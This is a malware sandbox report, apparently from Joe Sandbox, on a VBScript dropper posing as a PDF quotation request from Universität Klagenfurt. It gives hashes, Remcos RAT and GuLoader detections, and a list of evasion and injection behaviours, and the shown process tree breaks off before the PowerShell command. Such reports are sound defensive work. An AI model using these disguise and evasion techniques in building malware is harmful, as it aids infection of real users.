Windows
Analysis Report
ANGEBOTSANFRAGE (Universität Klagenfurt) 10-03-2025·pdf.vbs
Overview
General Information
Sample name: | ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbs (renamed because original name is a hash value) |
Original sample name: | ANGEBOTSANFRAGE (Universität Klagenfurt) 10-03-2025·pdf.vbs |
Analysis ID: | 1634190 |
MD5: | 8021cc623d59a1db7f0f3e305f370449 |
SHA1: | 674669f5ded1c632e1d18b149f902ca41c00fdb2 |
SHA256: | a354b3d778c617b5abfd7e9717e095053838e9c1e5eed9cc03937a9ca85d97c6 |
Tags: | DEU, geo, RAT, Remcos, RAT, vbs, user-abuse_ch |
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7032 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
PING.EXE (PID: 6416 cmdline: ping Host_6637.6637.6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D)
conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
powershell.exe (PID: 4504 cmdline: